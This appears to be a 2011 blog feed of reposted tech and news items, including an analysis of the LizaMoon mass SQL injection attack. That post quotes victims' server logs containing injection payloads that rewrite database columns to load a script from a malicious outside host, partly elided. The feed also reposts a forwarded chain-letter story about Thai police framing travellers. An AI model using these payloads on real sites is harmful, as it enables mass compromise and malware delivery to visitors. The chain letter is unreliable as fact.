不管你是用 Android 或是 iOS 系統的 iPad/iPhone 手機,買來一定要做一件事情,那就是下載應用程式 (APP) 來好好的玩一下囉!但是因為 App Store 上面許多好用的 app 通常都要付費,免費版功能又很機車的被作者給閹割掉,那到底要怎麼辦才能享用這些好用的 app 呢?
多數的人一定想到的是 JB 這招吧!這也是一個不錯的方法,但 JB 畢竟是非正規的做法,雖然可以規避掉原廠的一些限制,不過相對地就要自己承擔 JB 失敗的風險。不過,其實有許多 app 都會不定期推出限時免費的活動,只要善用一些免費 app 的介紹網站,不但可以取得最新 app 的資料,還可以追蹤限時免費的 app 唷!
正港本土,天天免費 – iapp
iapp 是目前台灣專門介紹 iOS 應用程式的網站中唯一一個每天提供限時免費 app 資訊的網站。網站的小編每天早上(假日好像是下午)會蒐集當天免費的 app 資訊,並且做一些簡單的測試、介紹後,統整成一篇文章 PO 出來分享給大家。除此之外,iapp 的小編們還會挑選一些不錯的 app 出來做專文介紹,對不想花太多時間搜尋 app 的朋友來說,可說是非常貼心的服務喔。
▲ 先看看網友的評分和評鑑報告,避免買到地雷 app。
▲ 限時免費 app 資訊,提供簡短的介紹
對岸的也很猛 - 愛Apps
愛Apps 是類似前面介紹的 iapp 的網站,不過因為是對岸的...內容當然就是簡體字為主啦!不過介紹的 app 倒是不用擔心,因為愛Apps 介紹的 app 也是以英文 app 為大宗,不必擔心介紹的都是阿陸仔的 app 啦。
不過比較特別的是愛Apps 有提供「特約限免」的分類,既然是「特約」那這些 app 主要都是當地開發商所提供的,如果想要找中文內容或者一些中華文化的 app,通常在這個分類裡面會比較容易找到。
▲ 在下載的按鈕下方有以圖示顯示 app 適用的裝置類型
免費就找他 - AppShopper
AppShopper 是目前看過介紹 app 的網站中功能最齊全也最完整的。AppShopper 除了提供免費 app 的資訊外,還可以設定要追蹤價格的 app,如果看到喜歡的 app 但是卻太貴沒辦法下手的話,可以把 app 加入禮物清單 (Wishlist),當 app 降價或免費的時候,AppShopper 就會馬上通知你!
另外,AppShopper 還提供 iPhone 和 iPad 版的 app (也叫 AppShopper),如果你的 Wishlist 內的 app 有降價的話,AppShopper 就會馬上發送通知給你,完全掌握 app 價格變動的資訊。
▲ 把有興趣的 app 加入 wishlist,隨時追蹤 app 的現況
▲ 提供完整的 app 變動資訊,無論更新、新上架、價格異動都會顯示
▲ 如果想追蹤 app 的話,點一下「Want It」就可以囉
▲ app 的活動紀錄,可以清楚看到 app 價格變動的紀錄,隨時堵人 XD
app 的降價就像現實世界的拍賣會一樣,都是有限時的。在我們介紹的三個網站中,目前只有 AppShopper 網站上的資訊是系統化地在更新,其他兩個都是需要人工更新文章,所以要下載限時免費的 app 之前,務必要注意是否已經超過了免費的優惠時段,否則買錯了還要跟 Apple 說明原因才有辦法退款,都是麻煩。總之,要就快,否則眼睛就得睜大點囉!
2011年3月31日 星期四
iPhone/iPad 免費應用程式(app)推薦網站,讓你免費 APP 載不完
驚見SQL Injection攻擊大海嘯-LizaMoon - 黑暗執行緒
資安廠商Websense在3/29發佈了一則消息,一個被命名為LizaMoon的SQL Injection攻擊正在席捲全球,已有許多網站遭受攻擊,網頁內容中被塞了<script src=」httq: // lizamoon . com / ur . php」>疑似掛馬連結,
透過Google查詢lizamoon. com關鍵字,被稙入惡意連結的URL數在兩天內由28,000個急速增加到380,000個(2011/03/31 22:00 UTC+8時的資料),有如海嘯狂掃(Websense說: it makes it one of the bigger mass-injection attacks we have ever seen.),甚至iTune網站也名列其中。不過,依據分析iTune中出現的惡意連結已被HtmlEncode為<script不至產生危害,並且推斷中鏢資料下載自其他資訊源,並非iTune本身受害,而加上HtmlEncode的處置也深得Websense讚許。(HtmlEncode真的很重要! 由ASP.NET 4特別為它提供更簡潔的新語法就知道它被呼叫的頻率該有多高,如果你不知道為何它與資安有關,不妨看一下ASP.NET防駭指南)
httq: // lizamoon. com / ur . php這個URL目前是無效的(該不會因為被太多植入連結網站DDoS打掛了吧? XD),但網站是活的。在它曾經有效的一段期間,ur.php會傳回一段Script將使用者導向一個著名的假冒防毒網站,不過該網站也掛點中。Websense調查了lizamoon. com的底細,發現它是3/25才用假資料註冊的,換句話說,這波攻擊只花了短短幾天就污染了超過38萬個網址(以URL計,非網站數),而且開始注入開始出現lizamoon以外的網域名稱的Script連結網址。
My database was inserted a string like "</title><script src=http:// lizamoon. com / ur . php></script>". Event(Even?) the username field in aspnet_users table. So now I can't login my website if I use asp.net security. Who know about this problem please tell me what happening with my database or my website.
由開場白看來,連aspnet_users的username欄位都被注入惡意script連結,非常像古早前看過的游擊式SQL Injection攻擊,攻擊程式將全部SQL指令濃縮成一列,隨意嘗試連上有帶QueryString參數並夾帶攻擊用的SQL指令加在網址後方,一旦該網頁有SQL Injection漏洞,則附加於參數中的SQL指令就會被執行,查詢SQL Server的sysobjects, syscolumns,列出所有的文字欄位,並透過UPDATE指令在所有文字欄位都插入惡意script連結,一旦這些欄位被讀取顯示在前端,又未經HtmlEncode轉換,網頁中就會包含<script src="惡意Script" />,所有連上該網站的訪客,都會被迫載入惡意Script執行邪惡任務。相關的原理在游擊式SQL Injection攻擊一文中已有詳細解說楚,這裡不再贅述。
- Same for us. We cleaned the code yesterday, and moments ago... the same. (會反覆中鏢,表示攻擊程式不只一隻? 或是程式會持續攻擊?)
- 幾個可疑IP:來自羅馬尼亞),來自烏克蘭,著名的邪惡網路)
- 網友提供珍貴的IISLog(進行入侵鑑識時,這是超重要的線索)
2011-03-11 16:34:45 W3SVC1746246233 *MYSERVERIP* GET /dir/linkdetail.aspx id=11011+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+where+TABLE_NAME+not+in+(SELECT+TOP+0+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))-- 80 - Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax) 500 0 0
Doc.asp?id=PU12731+update+gCategoriasHistoricoTiposDescripciones+set+Descripcion=REPLACE(cast(Descripcion+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105) ....省略, 用CHR(nn)一個字元一個字元組出</title><script src=httq:// lazemoon .com / ur . php></script>…%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- - Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax) - 302 498
2011-03-29 17:56:49 <<my server ip address>> GET /<<pagename>>.asp prod=MG0011'+update+tblMembers+set+Forename=REPLACE(cast(Forename+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105) ....省略, 用CHR(nn)一個字元一個字元組出</title><script src=httq:// lazemoon .com / ur . php></script>… %2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- 80 - HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax)
由這些Log來看,惡意SQL會鎖定特定Table及欄位,不像上回觀察用sysobjects, syscolumns+CURSOR亂槍打鳥,顯示本次攻擊並非打了就跑,會先掌握資料庫Schema的資訊後再精準下手,所以前後應有多次存取(不知道為什麼要選擇這種做法,我還是覺得游擊式的玩法比較有創意,唯一的缺點是Table、欄位及資料很多時,執行起來耗時較久)
- 3/31起出現了非LizaMoon的網域用來掛ur.php (tadygus . com, verhoef – training. co. uk, t6ryt56 . info) ,顯示透過防火牆封鎖lizamoon. com也無法社絕使用者誤連惡意網站的可能。
雖然對LizaMoon SQL Injection充滿好奇,但依目前蒐集到的資料就只能做出以上推測,如果有新的發展再做補充囉。
老話一句,大家千萬不要把SQL Injection寫進程式裡變成害網站裸奔的豬頭呀! 看不懂? 請參見這裡。
2011年3月30日 星期三
Solidot | 三星在筆記本中植入鍵盤記錄程序
Mohamed Hassan在他的全新三星筆記本中發現了鍵盤記錄程序。第一次也許是意外,但兩次絕非巧合,他在兩個型號的三星筆記本中都找到了鍵盤記錄程序。他聯絡了三星技術支持,第一次對方否認;第二次給出新證據後對方換了口風,表示鍵盤記錄程序是用於“監視機器的性能,瞭解用戶如何使用機器”。換句話說,三星在未徵詢用戶許可的情況下收集了他們的使用數據。目前三星的公關拒絕對此事發表評論。
資安表示: 不怕神一樣的對手... - 黑暗執行緒
資安表示: 不怕神一樣的對手...
SQL Injection是老梗中的老梗,在資安界歷久彌新,但連資料庫MySQL的官方網站捅出這種簍子還真是諷刺。這也再次驗證: 不管你寫的是ASP、PHP還是JSP,連的是SQL、MySQL、Oracle、或是什麼怪DB,只要一個不小心,人人都可能變成害網站裸奔的北七。(再次呼龥,如果你的工作是寫與DB有關的程式,卻不知道什麼是SQL Injection,請發揮良心,即日起雙手打上石膏裝殘請長假,在搞懂它的殺傷力之前,別再寫半行Code)
再來看Comodo的憑證被盜用事件。Comodo是有名的的SSL憑證發行機構(Certificate Authority),CA自身的憑證被盜用,象徵惡意人士可假冒CA簽發特定網站的SSL憑證,由於是用真實的CA憑證所簽發,瀏覽器無從識別真假,唯一的補救之道是透過CRL(Certificate Revokation List)撤銷被冒名簽發的憑證,但這有賴於瀏覽器或接受憑證的程式主動取得CRL查驗憑證的有效性,若是程式偷懶省略了驗證步驟,就會誤信冒牌憑證,任由使用者連上惡意網站或被竊聽而不自知。舉個粗淺的例子,報導中提到mail.google.com也在受影響之列,如此駭客就可透過Man-In-The-Middle的攻擊手法,在使用者使用HTTPS連上mail.google.com時從中攔載竊聽,並使用假冒的mail.google.com SSL憑證再加密資料傳給使用者,若使用者的瀏覽器未進一步查驗假冒SSL憑證已被撤銷,則由使用者的觀點,使用HTTPS連上mail.google.com,傳回資料又經過有名CA,Comodo公司,簽發給mail.google.com網站的SSL憑證加過密,安全亳無瑕疵,事實上帳號、密碼、信件內容早已被看光光。(最近剛好有篇文章討論到類似的攻擊手法--不要錢的無線網路 -- 最貴)
掌控資安機制信任關鍵的CA居然發生此等管控疏失,令人搖頭,但有趣的事來了---一名伊朗駭客說:Comodo憑證被盜事件是我幹的! 依據該宣告內容,該名駭客是先入侵義大利一家SSL憑證經銷商InstantSSL.it的伺服器,取得完全控制權(FULL access)後找到一個TrudtDll.dll,發現它是用C#寫出用專門與CA簽發憑證API溝通的程式庫,經過反組譯,居然找到該經銷商連線GeoTrust與Comodo所用的帳號密碼,GeoTrust的API URL不能連,但Comodo的URL與經銷商帳號是有效的。駭客先生很自豪他在沒有文件的情況下,很快摸索出了AutoApplySSL與PickUpSSL兩組API的規格,並成功寫出透過這兩個API簽發SSL憑證的工具程式。宣告裡一再強調 "我好強 我好快 我好威 我好猛" "But I did it very very fast."(就尊敬他為"好快哥"吧!) 並聲稱自己只有21歲,感覺上還稚氣未脫,不是那種太陽穴隆起,目露精光的神人~~ XD (iTHome報導中說反組譯後找到"Comodo執行長與資料庫的帳號與密碼"似乎與宣告描述不符。)
- PKI機制有無重大瑕疵?
看來還夠可靠(事實是目前也找不到更好的替代品),但CRL機制需要客戶端程式主動驗證才會發揮效果,可能會因程式疏忽產生漏洞。- Comodo有無重大缺失?
不確定。因為好快哥並沒有說自製的憑證簽發程式是放在InstantSSL.it的主機上執行(反正他說有FULL access權限),或是透過Internet就能隨意簽發憑證。若為前者,Comodo應無過失;若是後者就大有問題,簽發憑證API不鎖定來源IP,代表任何人只要取得經銷商帳號就可以在星巴克用免費無線網路生一張憑證出來,顯然不安全。- 誰是頭號戰犯?
薑!薑!薑!薑! InstantSSL.it公司在本案獲頒最佳豬頭獎且當之無愧。伺服器被人攻破,程式檔案被看光光,依推測該伺服器應有具備由程式機制簽發憑證的能力,在主機已被入侵的前題下,不管經銷商帳號密碼是被Hardcode在DLL中,還是加密後寫在config裡,不管程式是用C#、Java還是組合語言寫,只要主機控制權失守,被破解只是時間早晚問題。在資安神人Gary Hoglund落難記裡,Anonymous發動鄉民進行DDoS的部分無險可守,看來只能無奈承受,但有趣的是,駭客只靠著假造一封信"我人在國外,有急事要連回公司,請打開防火牆,root密碼設成xxxx"的社交攻擊,就騙倒IT經理,當場敞開大門,恭迎駭客大軍入城。
Which DNS Server Should You Use On Your Computer?
The job of a DNS server is to translate domain names (like google.com) into IP addresses (like and it does this for every new new site that you visit in the browser. Therefore, no matter how fast your Internet connection speed is, a site won’t load unless the DNS server has performed the lookup successfully.
When it comes to choosing a DNS server, you’ve several choices. There are public DNS services like OpenDNS and Google DNS or you could use the DNS Server of your ISP itself. To find your current DNS server, type ‘ipconfig /all’ at the command prompt and look for the “DNS Server” entry under Ethernet adapter.
The speed at which a DNS server can resolve domain names into IP addresses depends on its geographic location among other factors. Therefore, for example, OpenDNS could be the fastest performing DNS server for a user in location A but Google DNS could be a better choice for another user in location B.
If you would like to know which is the fastest DNS Server for your computer, there’s a free utility called DNS Benchmark that can help. It will test the speed of all the popular DNS Services, including OpenDNS and Google DNS, from your computer and then arranges them in the decreasing order of performance.
The bars represent the average time it takes for a DNS service to resolve web domain names into their equivalent IP addresses and thus, the lower the better. DNS Benchmark is Windows-only but Namebench is a good option if you are on Linux or Mac. For some reason, I could not get Namebench to work on Windows 7. [via Cali Lewis]
One more thing..
Most DNS services offer resolvers at two IP address - for instance, Google DNS is available at and – and they are used in the same order in which they are listed in your network settings.
You should therefore look at the performance of individual DNS servers and set the “Preferred DNS Server" as the one that has the lowest score. In fact, you may also mix servers – like you can use Google Public DNS as the Preferred DNS server and OpenDNS as your Alternate DNS server.
The following video describes how you may change the DNS settings on your computer:
' + google_ads[i].line1 + '' + google_ads[i].visible_url + '
' + google_ads[i].line2 + ' ' + google_ads[i].line3 + ' '; if (i '; } u = 'Ads by Google ' + u + ''; } google_adnum = google_adnum + google_ads.length; document.write(u); return; } google_ad_client='pub-3152670624293746';google_ad_output = 'js';google_ad_type = 'text';google_feedback = 'on';google_language = 'en';google_encoding = 'utf8'; google_max_num_ads = '2'; google_ad_channel='4355338828';google_skip=google_adnum;
2011年3月29日 星期二
Mysql.com Website hacked by SQL Injection |
Mysql.com Website compromised by SQL Injection
March 29th, 2011
As bizarre as it can be, believe it or not, MySQL.com has been hacked and a part of the database containing member and employee email addresses, usernames and passwords has been published by the hackers on Pastebin.com.
The compromise has garnered quite an interest from the security community for two simple reasons.
For one, it seems that MySQL.com (and MySQL.fr, MySQL.de and MySQL.it) servers have been targeted with a blind SQL injection attack by two hackers that go by “TinKode” and “Ne0h”. According to Techie Buzz, it is possible that an XSS vulnerability affecting MySQL.com – discovered and submitted by TinKode back in January – has also been used in the attack.
Details of the blind SQL injection vulnerability have been revealed in an email sent to the Full-Disclosure mailing list.
Secondly, the login credentials revealed in the published part of the database have demonstrated that MySQL employees are not big fans of strong passwords. For example, Robin Schumacher, MySQL’s Director of Product Management, uses a simple four digit password for WordPress. A number of other accounts have “qa” as a password.
Sun, MySQL’s parent company, has also been attacked by the same hackers. The targeted websites are www.reman.sun.com and www.ibb.sun.com, and they also proved to be vulnerable to a SQL injection attack. Whether they exploited the same vulnerability that compromised MySQL.com, they didn’t say. The hackers again published some of the gathered information, but this time they didn’t make login credentials public.
Source: Help Net Security (Language:
遊泰國 ~ 一定要看!
原本我不給,同團的朋友說:算了! 給他一點好了
我就把剩下的泰國錢 全給他了,大約合台幣 2,3百
所以,以下這則新聞 我想一定是泰國海關人員刻意栽贓的
ps: 當時領隊陳建鴻( 鳳凰旅遊 )感謝您了!
不是你的行李不要亂碰亂拿喔 , 必看
國人李進益去年 7月30日自泰國曼谷返國,在通關經過隨身行李X光機時,在其行李後面有一個手提包無人認領(有人故意放的),
李進益被泰國女警(嫁禍)叫住,以為是女警因為行李太重,請他幫忙將行李拿下來 ,李進益將行李拿下放在地下之後,就轉身拿著自己的行李登機 ,不料卻因此被泰國警方依攜帶含有安非他命的減肥藥逮捕,其間還向他索賄400 萬元泰銖(約 323 萬台幣)他被關了一年多才 釋放。
國民黨立委楊麗環舉行記者會,揭發泰國司法黑幕,楊麗環指出,毒品已經成為東南亞很多國家陷害國人、索賄的理由,國人出國在外必須相當小心 ? (為什麼台灣政府沒有大力宣傳告知國人)
李進益在記者會中現身說法,表示自己因為在泰國經商,被當地警察索賄很多,知道泰國警察的作法,必須要順著對方的意思,原本他已經過了X光機,向前走了 5、6步,卻被女警兇惡的叫住,他因為不懂泰文,以為是對方要他把行李拿下來,他就轉身把行李拿下放在地上(錯誤),隨即拿起自己的行李登機。
李進益說: 進了監獄之後,當地的商務代表處隨即前往關心,並行文泰國警務廳要求把他腳鐐拿掉,別國的人民在行文之後都可以拿掉腳鐐 ,但因為我們與泰國沒有邦交(因為台灣不是聯合國承認的國家),泰國根本不理,他腳鐐一直戴了5個多月才拿掉,期間泰國警方還向他索賄,要求 5萬泰銖即可拿掉腳鐐。
李進益遭拘禁期間,泰國警方還向他開價400萬泰銖。由於堅持自己沒有犯罪,李進益屢次在泰國法庭上要求法官向泰國緝毒警察局索取現場錄影帶證明自己的清白,緝毒組卻以證人、證據未到等理由,前後13次要求法院延期審理,直到今年 8月2日才將錄影帶送到法官手中,法院在 9 月 3 日 開庭之後, 判決李進益當庭無罪釋放。
請各位用力傳閱 ! ! 不是只有廣傳.
10 Office Pranks Perfect for April Fools’ Day
Ah, April Fools’ Day. That dreaded day of the year that news editors and the gullible public love to hate. While we can’t wait to see what amusing pranks the likes of Google are cooking up, you can plot your own fun in the meantime.
We’ve got 10 suggestions, ranging from vintage classics to more up-to-date tricks that you can play on your colleagues, friends and frenemies.
If your office has a good sense of humor and you’re looking for a bit of light-hearted, harmless fun this April 1, take a look through the gallery for our ideas and please share your own suggestions in the comments box below.
View As Slideshow »1. Speech Recognition2. Crossed Wires3. Quick Change4. Fun with Mice5. Hunt the Paper Clip6. This Stall is Occupied7. BSoD8. Can You Hear That?9. Wrong Number10. Just Smirk it OutThumbnail image courtesy of iStockphoto, kutaytanir, gallery images courtesy of Flickr, Josh Derr, Kate, jrpinky_boi, Daniele Pieroni, jessi, Eric P, Josh Liba, Ren Adams, Martin Pettitt and Tricia
Amazon Gives You 5 GB of Storage Space for Free
Amazon today unveiled a new storage service called Amazon Cloud Drive that gives you 5 GB of free online storage space to store your documents, photos, music and other files securely in the cloud. All you need is a free Amazon.com account to upload your files which you can then access from anywhere using a web browser.
Amazon Cloud Drive is purely an online file storage solution and the only client that you can use to upload or download files from your Cloud Drive account is your web browser.
Thus, for example, if you plan to copy your entire My Documents folder from the computer to Amazon’s cloud, you’ll have to upload files manually from the browser, one by one. Or, to save time, you could zip the entire folder into a single file and upload it in one go as Cloud Drive supports files as large as 2 GB in size. (Dropbox has a file size limit of 300 MB).
Amazon offers a handy desktop client that will scan your hard drive for music related files and will automatically put them to Cloud Drive - you then listen to your music from anywhere using the browser itself without having to download anything to that computer. Other than that, I think the Cloud Drive service is also good for manually backing up some of your really bulky files online - like those Outlook PSTs.
Amazon S3 vs Amazon Cloud Drive
There’s however one part about Cloud Drive that has surprised me a bit – the pricing structure. The service internally uses Amazon S3 for storage but if you compare the storage cost of these two services, you’ll find that Amazon S3 is nearly 80% more expensive than Cloud Print.
Amazon charges 14¢ per month per GB for S3 which converts to around $1.78 per year (including the 10¢ data transfer fee) while Cloud Drive is available for a flat $1 per GB per year with no transfer-in or transfer-out fees. S3 is one of the popular choices for online backup but going forward, Cloud Print could be a more cost-efficient option.
Bonus Tip – Upgrade to 20 GB for less than $1
All Amazon Cloud Drive users get 5 GB of free online storage space or you can pay $20 to upgrade to the 20 GB plan.
There’s another option as well. Amazon will upgrade your storage to 20 GB if you buy any MP3 Album from them. Now there are quite a few music albums on Amazon.com that are available for less than $1 – buy any one and you’ll be upgraded to 20 GB.
The only downside is that while Cloud Drive is available to everyone worldwide, Amazon’s music store is only for residents of the United States with a U.S. billing address.
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Evernote (Finally) Updates Its Web Interface
The Web version also features Notebook Stacks (so you can easily group your Notebooks), a Snipper view (so you can see contents without having to actually open a note), and Autosave.
The Changing (And Growing!) Evernote Demographic
CEO Phil Libin says that only 13% of Evernote users currently use the Web version, and with those statistics in mind, it does make sense that this was the last app for the company to redesign.
But Libin notes that since Evernote's launch, its demographics have shifted substantially. No longer is Evernote solely used by professionals (professionals with their fancy smartphones and native apps, that is). The tool is becoming used by more and more students. For many of them, that means using the Web version - not simply because they're accessing Evernote via the computer lab, but because (and please take note here developers) they don't download software and they prefer the browser.
This update also adds a new feature to Evernote: the ability to share individual notes over Facebook and email. Users will be able to share a note with others - in the words of Libin "share your private brain with the social brain."
The addition of a Facebook share mechanism comes pretty late in the game for Evernote. While startups are often told to include viral loops like Facebook, Evernote has hardly needed such a thing. The company is adding over 26,000 new users a day. Nonetheless, the ability to share notes to a Facebook wall or to a Facebook group will likely only serve to help boost that growth.
See Also
2011年3月28日 星期一
台電一直不敢說的秘密, 關於跳電 @ maymay的國境 :: 隨意窩 Xuite日誌
Which DNS Server Should You Use On Your Computer?
The job of a DNS server is to translate domain names (like google.com) into IP addresses (like and it does this for every new new site that you visit in the browser. Therefore, no matter how fast your Internet connection speed is, a site won't load unless the DNS server has performed the lookup successfully.
When it comes to choosing a DNS server, you've several choices. There are public DNS services like OpenDNS and Google DNS or you could use the DNS Server of your ISP itself. To find your current DNS server, type 『ipconfig /all' at the command prompt and look for the 「DNS Server」 entry under Ethernet adapter.
The speed at which a DNS server can resolve domain names into IP addresses depends on its geographic location among other factors. Therefore, for example, OpenDNS could be the fastest performing DNS server for a user in location A but Google DNS could be a better choice for another user in location B.
If you would like to know which is the fastest DNS Server for your computer, there's a free utility called DNS Benchmark that can help. It will test the speed of all the popular DNS Services, including OpenDNS and Google DNS, from your computer and then arranges them in the decreasing order of performance.
The bars represent the average time it takes for a DNS service to resolve web domain names into their equivalent IP addresses and thus, the lower the better. DNS Benchmark is Windows-only but Namebench is a good option if you are on Linux or Mac. For some reason, I could not get Namebench to work on Windows 7. [via Cali Lewis]
One more thing..
Most DNS services offer resolvers at two IP address - for instance, Google DNS is available at and – and they are used in the same order in which they are listed in your network settings.
You should therefore look at the performance of individual DNS servers and set the 「Preferred DNS Server" as the one that has the lowest score. In fact, you may also mix servers – like you can use Google Public DNS as the Preferred DNS server and OpenDNS as your Alternate DNS server.
The following video describes how you may change the DNS settings on your computer:
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[Android]超好用的工具大集合---「ZDbox 正點工具箱」
Android有很多工具軟體都很好用,但是每次都要一個一個安裝,有點浪費系統資源,最重要的是很多還要花錢購買才能下載,之前有位噗友介紹了一個不錯用的系統工具---「ZDbox」,但當時作者只在XDA發表並沒有在Android Market上架所以我就沒拿出來寫,最近「ZDbox」已經在Market上架了,而且還是完整中文化介面,重點是「免費」!!所以今天要推薦的就是這套ZDbox:
首先至Android Market搜尋「ZDbox」並下載(FREE):
「軟體管理」可以將程式搬移到記憶卡(需Android 2.2)也可以一次移除數個軟體,筆者以移動程式為例,先點選「批量移動程式」,程式會顯示所有支援APP2SD的程式:
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